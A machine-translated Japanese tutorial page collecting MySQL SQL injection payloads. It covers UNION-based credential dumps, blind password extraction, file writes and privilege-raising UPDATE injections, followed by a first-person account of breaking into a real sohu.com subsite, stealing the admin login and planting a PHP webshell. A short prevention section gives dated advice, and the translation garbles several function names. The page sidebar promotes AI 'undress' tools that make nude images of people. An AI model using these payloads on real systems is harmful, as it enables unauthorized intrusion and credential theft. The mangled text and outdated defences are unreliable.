ホームページ php教程 php手册 PHPにおけるSQLインジェクションプロセスの分析

PHPにおけるSQLインジェクションプロセスの分析

Jun 13, 2016 pm 12:03 PM
php sql 分析する 基本 勉強 スキル 注射 プロセス

今日はインターネットから SQL インジェクションに関する基本的なスキルを学びました。 SQL インジェクションの焦点は、SQL ステートメントを構築することです。SQL
ステートメントを柔軟に使用することによってのみ、素晴らしいインジェクション文字列を構築できます。勉強した後はメモを書き、いつでも使えるようにしています。以下の内容を読む前に、SQL の基本原理を理解していただければ幸いです
。メモ内のコードはインターネットから取得したものです。
===基本部分===
このテーブルクエリ:
http://127.0.0.1/injection/user.php?username=angel' と LENGTH(パスワード) ='6
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m
ユニオン Union ステートメント:
http://127.0. 0.1/injection/show.php?id=1' Union select 1,username,password from user/*
http://127.0.0.1/injection/show.php?id=' Union select 1,username,password user/*
からファイルをエクスポートします:
http://127.0.0.1/injection/user.php?username=angel' を出力ファイル 'c:/file.txt
http://127.0.0.1 /injection/user.php?username=' または 1=1 into outfile 'c:/file.txt
http://127.0.0.1/injection/show.php?id=' Union select 1,username,passwordユーザーから出力ファイル 'c:/user.txt
INSERT ステートメント:
INSERT INTO `user` (ユーザー ID、ユーザー名、パスワード、ホームページ、ユーザーレベル) VALUES ('', '$username ', '$password', '$homepage', '1');
構築されたホームページの値は次のとおりです: http://4ngel.net', '3')#
SQL ステートメントは次のようになります: INSERT INTO ` user` (ユーザー ID、ユーザー名、パスワード、ホームページ、ユーザーレベル) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3')#', '1'); 🎜 >
UPDATE 文: こういうのが好きです まずはこの SQL 文を理解してください
UPDATE user SET password='MD5($password)',homepage='$homepage' WHERE id=' $ id'
この SQL を次の形式に変更するとインジェクションが実現します
1: ホームページの値を
http://4ngel.net', userlevel='3
に変更します。 SQL ステートメントは次のようになります。 For
UPDATE user SET password='mypass',homepage='http://4ngel.net', userlevel='3' WHERE id='$id'
Userlevel はユーザー レベル
2: 変更 パスワード値は
Mypass)' WHERE username='admin'#
その後、SQL ステートメントは
UPDATE user SET password='MD5(mypass)' WHERE username='admin'#) になります。 '、homepage= '$homepage' WHERE id='$id'
3: id 値を
' または username='admin'
に変更すると、SQL ステートメントは
UPDATE user SET password になります。 ='MD5($password)',homepage='$homepage' WHERE id='' OR username='admin'

===高度な部分=== よく使われるMySQLの構築-in 関数
DATABASE ()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
database()
version()
SUBSTRING( )
MID()
char()
load_file()
……
関数アプリケーション
UPDATE 記事 SET title=DATABASE() WHERE id=1
http://127.0.0.1/injection/show.php?id=-1 Union select 1,database(),version ()
SELECT * FROM user WHERE username=char(97,110,103,101,108)
# char(97,110,103,101,108) は angel、10 進数に相当します
http://127.0.0.1/injection/user.php?userid=1そして、password=char(109,121,112,97,115,115)http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100)
http://127.0.0.1/ injection /user.php?userid=1 and ord(mid(password,3,1))>111
データ構造内のフィールドの数と型を決定します
http://127.0.0.1/injection /show.php?id=-1 Union select 1,1,1
http://127.0.0.1/injection/show.php?id=-1 Union select char(97),char(97),char (97)
データテーブル名を推測
http://127.0.0.1/injection/show.php?id=-1 Union select 1,1,1 from members
取得するクロステーブルクエリユーザー名とパスワード
http://127.0.0.1/ymdown/show.php?id=10000 Union select 1,username,1,password,1,1,1,1,1,1,1,1 ,1,1,1,1 ,1,1,1 from ymdown_user where id=1
その他
#最初のパスワードを確認
http://127.0.0.1/ymdown/show.php?id =10 Union select 1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord( mid(password,1,1 ))=49
===インジェクション防止===
サーバー アスペクト
Magic_quotes_gpc はオンに設定されます
Display_errors はオフに設定されます
エンコード アスペクト
$keywords = addlashes($keywords) ;
$keywords = str_replace("_","_",$keywords);
$keywords = str_replace("%","%",$keywords);
数値型
intval() のキャッチと置換を使用します
文字列型
SQL ステートメントのパラメーターには一重引用符を追加する必要があります
インジェクションを防ぐために次のコードが使用されます
if (get_magic_quotes_gpc( )) {
//... .
}else{
$str = mysql_real_escape_string($str)
$keywords = str_replace("_","_",$keywords);
$keywords = str_replace("%" ,"%",$keywords);
}
便利な関数
tripslashes()
get_magic_quotes_gpc()
mysql_real_escape_string()
trip_tags()
array_map()
Addslashes()
参考記事:
http://www.4ngel.net/article/36.htm (MySQL による SQL インジェクション) 中国語
http ://www.phpe.net/mysql_manual /06-4.html (MYSQL ステートメント リファレンス)
sohu.com のセキュリティ チェック
Hacker Defense Line で公開
http://www. loveshell.net
sohu.com 中国では比較的大きなポータルサイトで、メールをはじめ多くのサービスを提供しています。よく言われるように、このような大規模な Web サイトでは問題を回避するのは困難です。これはサーバーと Web サイトの両方に当てはまります。私は最近 MySQL インジェクションについて学びました。 sohu.com。SQL インジェクションの脆弱性があるかどうかを確認するための小規模なセキュリティ チェック。
sohu.com のメイン サイトを見ると、ほとんどすべてが静的であることがわかったので、メイン サイトで問題を見つけるという考えはあきらめました。 sohu.com のさまざまなサブサイトを直接閲覧したところ、ほとんどの Web サイトでは Php スクリプトが使用されており、一部の Web サイトでは JSP スクリプトが使用されていることがわかりました。経験に基づいて、Php で構築されたシステムの場合、バックグラウンド データベースは一般的にです。 Mysql は、ASP が Mssql に相当するのと同じように、まだ多くの問題が考えられるようです。 Php の特性 (Php はデフォルトで渡されたパラメータの ' などの文字を変換するため、デフォルトでは文字型の変数を注入することが困難です) により、通常は数値型の変数しか注入できません。通常のインジェクションの知識に基づいて、id=XXX の形式で渡されるパラメーターは一般に数値変数であることがわかっているため、脆弱性を見つけるには php?id=XXX を使用してそれらの接続をテストするだけで済みます。 XXX.it.sohu.com http://XXX.it.sohu.com/book/serialize.php?id=86
送信:
http://XXX.it で問題のある接続が実際に見つかりました。 sohu.com/book/serialize.php?id=86 and 1=1/*
図1のように通常に戻ります。
次に送信します:
http://XXX.it.sohu.com/book/serialize.php?id=86 および 1=2/*
図 2 に示すように、情報は返されません。空です。 SQL ステートメントの結果は空であるはずです。
これら 2 つの URL から、送信した and 1=1 と and 1=2 が SQL ステートメントとして実行されるため、脆弱性が存在すると推測できます。その後、これは SQL です!また、id 変数が数値として扱われ、'' の間に配置されていないこともわかります。そうでない場合は、変数が他の SQL キーワードをフィルターしなければ、成功する可能性があります。変数が選択をフィルターするという状況が数多く発生しました。これは、mysql の行き詰まりです。
抜け穴があるので、まずデータベース アカウントの種類と接続を検出します。高い権限があり、データベースと Web が同じマシン上にある場合は、フィールドを推測する手間を省くことができます:
http://XXX.it.sohu.com/book/serialize.php?id=86 とord (mid(version(),1,1))>51/*
図 3 に示すように、通常の状態に戻ります。このステートメントは、データベースのバージョンが 3 より大きいかどうかを確認するためのものです。3 の ASCII は51! バージョン 最初の文字が 51 より大きい場合は、もちろん 4.0 以降です。4.0 以降ではユニオン クエリがサポートされているため、1 つずつ推測する手間が省けます。つまり、データベースは 4.0 です。以上であればUnion対応可能です。
ユニオン クエリがサポートされているので、最初にこのステートメントのフィールドを公開しましょう。今後、ユニオンを使用してクエリを実行すると非常に高速になります。
http://XXX.it.sohu.com/ book /serialize.php?id=86 order by 10/*
返された結果は、図 4 に示すように正常です。送信を続けると、
http://XXX フィールドが 10 個を超えているようです。 .it.sohu.com/ book/serialize.php?id=86 20/* までにご注文ください
通常どおりに戻り、送信してください:
http://XXX.it.sohu.com/book/serialize.php? id=86 order by 30/ *
...
50 までに注文したところ、情報が返されなかったので、40 より大きく 50 未満のようだったので、送信しました:
http ://XXX.it.sohu. com/book/serialize.php?id=86 order by 45/*
...
ようやくフィールドが41あたりだと推測しました!一部のフィールドはソートできないため、フィールド番号が 41 であることを正確に特定するには、引き続き Union を使用する必要があります。
http://XXX.it.sohu.com/book/serialize.php?id=86および 1=2 共用体選択 1,2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41/*
返される結果は図のようになります5、ははは、ページにどのフィールドが表示されるかは一目瞭然です。送信しましょう:
http://XXX.it.sohu.com/book/serialize.php? id=86 および 1=2 ユニオン選択 1,user(),3,4 ,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
返された結果は図 6 に示すとおりです。データベース システムの検出は完了しました。ルートではない可能性があり、データベース サーバーと Web が同じサーバー上にない可能性があります。ファイル権限がある! 送信:
http://XXX.it.sohu.com/book/serialize.php ?id=86 and (select count(*) from mysql.user)>0/*
返された結果は図 7 に示されています。mysql には読み取り権限がありません。権限が root ではないことは間違いありません。笑
あなたは root ではないので、落ち込まずに続けましょう。データをさらに推測する前に、管理者パスワードを見つけても、ログインする場所が見つからないことがよくあります。これは非常に憂鬱です。バックエンドでよく使用されるアドレス (/ など) を追加します。 admin と /manage/ はすべて 404 エラーを返します。何度か推測した結果、/book/ ディレクトリで admin を実行しようとすると 403 Forbiden エラーが発生しました。しかし、ログイン ページは正常に存在しています。まさか、私は落ち込んでいます! しかし、管理者がいることがわかったので、Google で検索しましょう:
admin site:sohu.com
図 8 に示すように、別のサブのフォーラムが見つかりました。 -site 人を知っています。通常、場所のバックエンドの特性が Web サイト全体の特性になる可能性が高いため、/book/admin/admuser.php にアクセスしようとしたとき、奇跡が起こりました。図 9 に示すように、これで成功に近づきました。実際、元のファイルを見ると、ログイン フォームの名前もわかりました。名前とパスワードが一致しない場合でも、相手の管理者テーブルの構造を推測するのは簡単です (笑)。なぜ最初に背景を推測する必要があるのか​​が分かりました。 :
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1= 2 Union select 1,user(),3,4,database(),6,7,8 ,9,10,バージョン(),12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32 ,33,34,35,36,37,38,39,40,41 from admin/*
エラーを返します。admin テーブルが存在しないことを意味します。admins、admin_user などを試し、最後に次を送信します。
http://XXX.it.sohu.com/book/serialize.php?id=86 と 1=2 Union select 1,user (),3,4,database(),6,7,8, 9,10,バージョン(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, user/*
から 33,34,35,36,37,38,39,40,41 が返されました。これは管理者テーブルですか?送信するには:
http://XXX.it.sohu.com/book/serialize.php?id=86 と 1=2 Union select 1,name,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41 from user/*
空の情報を返すエラー、送信:
http ://XXX.it.sohu.com/book/serialize.php?id =86 および 1=2 共用体選択 1、パスワード、3、4、5、6、7、8、9、10、11、12、13、14、15、16、17、18、19、20、21、 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40,41 from user/*
返される結果は次のとおりです図 10 に示すように、正常に返され、パスワードが表示されます。これは、管理者テーブルの最初のユーザーのパスワードであるはずです。では、多くのフィールドでエラーが返されたと思います。 ID を入力するしかありません。ID は管理者の名前です。
http://XXX.it.sohu.com/book/serialize.php?id=86 と 1=2 です。ユニオン選択 1、パスワード、3、4、ID、6、7、8、9、10、11、12、13、14、15、16、17、18、19 、20、21、22、23、24、 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
返された結果を図 11 に示します。 , 管理者の名前を取得しました! 興奮して管理者の名前とパスワードをバックエンドに取り込み、ログインに成功しました。次に、Webシェルを取得する方法を考えます。バックグラウンドで画像をアップロードする場所を見つけましたが、phpファイルをアップロードすると、画像ファイルではないというメッセージが表示され、慎重に探しました。しばらくバックグラウンドを眺めていると、PHP ファイルを生成する機能があることがわかり、図 13 に示すように、そこに 1 文の PHP バックドアが挿入されました。 Generate をクリックすると、プロンプトが表示されれば成功したようです。はフィルタリングではないので、Web シェルを取得する必要があります。接続には 1 文のバックドアを使用します。Web シェルの取得後、スクリプトは成功したことを検出しました。 , サーバーに行って調べてみたところ、サーバーのセキュリティは良好でしたが、コマンドは実行できず、基本的にアップロードしたディレクトリ以外のすべてのディレクトリは書き込み可能ではありませんでした。ただし、スクリプトとして。テストでは、Web シェルを取得できれば成功したとみなされます。また、フィルタリングを行わない小さなパラメータが Web サイトの崩壊につながる可能性があることもわかります。特に sohu.com のような大規模な Web サイトでは、より多くのパラメータがあるため、より注意を払う必要があります。フィルタリングの問題に!

このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。

ホットAIツール

Undresser.AI Undress

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

Undress AI Tool

脱衣画像を無料で

Clothoff.io

Clothoff.io

AI衣類リムーバー

Video Face Swap

Video Face Swap

完全無料の AI 顔交換ツールを使用して、あらゆるビデオの顔を簡単に交換できます。

ホットツール

メモ帳++7.3.1

メモ帳++7.3.1

使いやすく無料のコードエディター

SublimeText3 中国語版

SublimeText3 中国語版

中国語版、とても使いやすい

ゼンドスタジオ 13.0.1

ゼンドスタジオ 13.0.1

強力な PHP 統合開発環境

ドリームウィーバー CS6

ドリームウィーバー CS6

ビジュアル Web 開発ツール

SublimeText3 Mac版

SublimeText3 Mac版

神レベルのコード編集ソフト(SublimeText3)

PHPとPython:2つの一般的なプログラミング言語を比較します PHPとPython:2つの一般的なプログラミング言語を比較します Apr 14, 2025 am 12:13 AM

PHPとPythonにはそれぞれ独自の利点があり、プロジェクトの要件に従って選択します。 1.PHPは、特にWebサイトの迅速な開発とメンテナンスに適しています。 2。Pythonは、データサイエンス、機械学習、人工知能に適しており、簡潔な構文を備えており、初心者に適しています。

アクション中のPHP:実際の例とアプリケーション アクション中のPHP:実際の例とアプリケーション Apr 14, 2025 am 12:19 AM

PHPは、電子商取引、コンテンツ管理システム、API開発で広く使用されています。 1)eコマース:ショッピングカート機能と支払い処理に使用。 2)コンテンツ管理システム:動的コンテンツの生成とユーザー管理に使用されます。 3)API開発:RESTFUL API開発とAPIセキュリティに使用されます。パフォーマンスの最適化とベストプラクティスを通じて、PHPアプリケーションの効率と保守性が向上します。

PHP:Web開発の重要な言語 PHP:Web開発の重要な言語 Apr 13, 2025 am 12:08 AM

PHPは、サーバー側で広く使用されているスクリプト言語で、特にWeb開発に適しています。 1.PHPは、HTMLを埋め込み、HTTP要求と応答を処理し、さまざまなデータベースをサポートできます。 2.PHPは、ダイナミックWebコンテンツ、プロセスフォームデータ、アクセスデータベースなどを生成するために使用され、強力なコミュニティサポートとオープンソースリソースを備えています。 3。PHPは解釈された言語であり、実行プロセスには語彙分析、文法分析、編集、実行が含まれます。 4.PHPは、ユーザー登録システムなどの高度なアプリケーションについてMySQLと組み合わせることができます。 5。PHPをデバッグするときは、error_reporting()やvar_dump()などの関数を使用できます。 6. PHPコードを最適化して、キャッシュメカニズムを使用し、データベースクエリを最適化し、組み込み関数を使用します。 7

PHP対Python:違いを理解します PHP対Python:違いを理解します Apr 11, 2025 am 12:15 AM

PHP and Python each have their own advantages, and the choice should be based on project requirements. 1.PHPは、シンプルな構文と高い実行効率を備えたWeb開発に適しています。 2。Pythonは、簡潔な構文とリッチライブラリを備えたデータサイエンスと機械学習に適しています。

PHP対その他の言語:比較 PHP対その他の言語:比較 Apr 13, 2025 am 12:19 AM

PHPは、特に迅速な開発や動的なコンテンツの処理に適していますが、データサイエンスとエンタープライズレベルのアプリケーションには良くありません。 Pythonと比較して、PHPはWeb開発においてより多くの利点がありますが、データサイエンスの分野ではPythonほど良くありません。 Javaと比較して、PHPはエンタープライズレベルのアプリケーションでより悪化しますが、Web開発により柔軟性があります。 JavaScriptと比較して、PHPはバックエンド開発により簡潔ですが、フロントエンド開発のJavaScriptほど良くありません。

PHPの永続的な関連性:それはまだ生きていますか? PHPの永続的な関連性:それはまだ生きていますか? Apr 14, 2025 am 12:12 AM

PHPは依然として動的であり、現代のプログラミングの分野で重要な位置を占めています。 1)PHPのシンプルさと強力なコミュニティサポートにより、Web開発で広く使用されています。 2)その柔軟性と安定性により、Webフォーム、データベース操作、ファイル処理の処理において顕著になります。 3)PHPは、初心者や経験豊富な開発者に適した、常に進化し、最適化しています。

PHPおよびPython:コードの例と比較 PHPおよびPython:コードの例と比較 Apr 15, 2025 am 12:07 AM

PHPとPythonには独自の利点と短所があり、選択はプロジェクトのニーズと個人的な好みに依存します。 1.PHPは、大規模なWebアプリケーションの迅速な開発とメンテナンスに適しています。 2。Pythonは、データサイエンスと機械学習の分野を支配しています。

PHP対Python:コア機能と機能 PHP対Python:コア機能と機能 Apr 13, 2025 am 12:16 AM

PHPとPythonにはそれぞれ独自の利点があり、さまざまなシナリオに適しています。 1.PHPはWeb開発に適しており、組み込みのWebサーバーとRich Functionライブラリを提供します。 2。Pythonは、簡潔な構文と強力な標準ライブラリを備えたデータサイエンスと機械学習に適しています。選択するときは、プロジェクトの要件に基づいて決定する必要があります。

See all articles